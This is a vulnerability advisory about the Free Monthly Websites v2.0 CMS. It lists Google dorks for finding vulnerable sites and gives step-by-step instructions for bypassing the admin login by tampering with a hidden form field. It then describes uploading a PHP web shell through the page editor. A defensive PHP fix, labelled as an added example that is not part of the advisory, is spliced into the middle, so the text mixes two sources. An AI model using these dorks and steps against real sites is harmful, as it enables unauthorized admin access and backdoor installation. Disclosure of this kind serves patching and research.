Title:
======
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities


Date:
=====
2013-02-04


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=851


VL-ID:
=====
851


Common Vulnerability Scoring System:
====================================
8.5

Introduction:
=============
Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have
taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken
care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you,
here's how it works. Upload Your Site To Your Domain (this can be done for you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).

(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )


Abstract:
=========
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.


Report-Timeline:
================
2013-02-04: Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Defensiv


Severity:
=========
Critical

Details:
========
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 Content Management System.
The first vulnerability allows attackers to bypass the web application authentication of the admin login.
The second vulnerability allows uploading, for example, web shells and accessing them after upload via unauthorized web access.

Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized File Upload & Access


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without required user interaction or a privileged application user account.
For demonstration or reproduce ...

Dork(s):
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0

[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16     $filename="settings/admin_settings.txt";
17
18     if(!$handle = fopen($filename, 'r'))
19     {
20         echo "Cannot open file ($filename)";
21         exit;
22     }
23     $contents = fread($handle, filesize($filename));
24     fclose($handle);
25     $argument_arr=explode("#_1_#",$contents);
26
27     if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28     {
29         $_SESSION[logged_in]=true;
30         header("location:welcome.php");

Based on line 16 we know that the admin username and password are stored in admin_settings.txt, NOT in a database!
So when we log in to the Admin Panel, file_io.php will read the valid username and password from admin_settings.txt.
If you directly access the file admin_settings.txt, the result is:

403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture: http://i48.tinypic.com/2gvlwt4.png


So... How to Bypass the Admin Login Page?
1st. Open the Admin Login Page: http://target.com/[path]/admin/index.php

2nd. Inspect Element on the login form.
Picture: http://i47.tinypic.com/2r5ddp1.png

3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">

CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png

4th. You will see a Login Failed page: >> You need to login in to access that page <<
Picture: http://i50.tinypic.com/33ws8jb.png
Never mind about that, just click the 'Login Button' and VOILA, you get Admin Access!
Picture: http://i45.tinypic.com/jzwpea.png
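The fix a defender would want for the bypass above, as an added example that is not part of the advisory or the vendor's code: the do_type action is allowlisted and read from POST only, the write action requires an authenticated session and a CSRF token, and the stored credential is a password_hash() digest checked with password_verify() instead of a plaintext string compared with ==. The action names, the "#_1_#" separator and welcome.php come from the advisory; the settings-file location outside the web root and the csrf field are assumptions.

```php
<?php
// Added example (not the vendor's code): a hardened dispatcher for file_io.php.
// Assumptions: the settings file is moved outside the web root, and it stores a
// password_hash() digest instead of the plaintext password after "#_1_#".
session_start();

$settingsFile = __DIR__ . '/../../private/admin_settings.txt';   // assumed location
// Read the action from POST only (never $_REQUEST) and allowlist it.
$action  = $_POST['do_type'] ?? '';
$allowed = ['admin_settings_read', 'admin_settings_write'];
if (!in_array($action, $allowed, true)) {
    http_response_code(400);
    exit('Unknown action');
}

function load_settings(string $file): array {
    $raw = file_get_contents($file);
    if ($raw === false) {
        http_response_code(500);
        exit('Cannot open settings');
    }
    $parts = explode('#_1_#', $raw, 2);
    return ['user' => $parts[0] ?? '', 'hash' => $parts[1] ?? ''];
}

if ($action === 'admin_settings_read') {                 // the login action
    $s = load_settings($settingsFile);
    // Constant-time username compare; password checked against its hash, not plaintext.
    if (hash_equals($s['user'], $_POST['username'] ?? '')
        && password_verify($_POST['pass'] ?? '', $s['hash'])) {
        session_regenerate_id(true);                     // no session fixation
        $_SESSION['logged_in'] = true;
        header('Location: welcome.php');
        exit;
    }
    http_response_code(401);
    exit('Login failed');
}

// admin_settings_write: the bypass shows this path is reachable before login.
// Require a live admin session and a CSRF token issued with the settings form.
if (empty($_SESSION['logged_in'])
    || !hash_equals($_SESSION['csrf'] ?? '', $_POST['csrf'] ?? '')) {
    http_response_code(403);
    exit('You need to login to access that page');
}
$newUser = $_POST['username'] ?? '';
$newHash = password_hash($_POST['pass'] ?? '', PASSWORD_DEFAULT);
file_put_contents($settingsFile, $newUser . '#_1_#' . $newHash, LOCK_EX);
```

Moving the file out of the web root removes the dependence on the 403 rule the advisory observed for /admin/settings/admin_settings.txt, so a misconfigured server no longer exposes the credential.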

----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell

This vulnerability works on the PREMIUM VERSION of Free Monthly Websites 2.0

So... How to Upload a Backdoor (PHP Shell)?

1st. Go to the Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Picture: http://i45.tinypic.com/vigzsp.png

3rd. Still on the same page, scroll down until you see this section: Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php, then click Sort Navigation Pages.
Picture: http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Picture: http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture: http://i46.tinypic.com/1zebnle.png

7th. Still on the same page, scroll down until you see this section: Enter Content For Your Page:
Click the SOURCE button.
Press Enter twice at the first line, then paste your PHP Backdoor/PHP Shell below.
And press Enter twice at the last line.
*Please see the 2 pictures below if you don't understand :p
Picture 1 : http://i49.tinypic.com/1zlzxq0.png
Picture 2 : http://i48.tinypic.com/291kc9h.png

If you wanna do this, please remove your backdoor password.
Click Save edited navigation page.

8th. After the message >> Data saved successfully << appears, visit the Home Page and you will see the Backdoor Page
Picture : http://i49.tinypic.com/4rt1g4.png


Risk:
=====
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.


Credits:
========
X-Cisadane - (stefanus_dp@ymail.com)
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory


--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com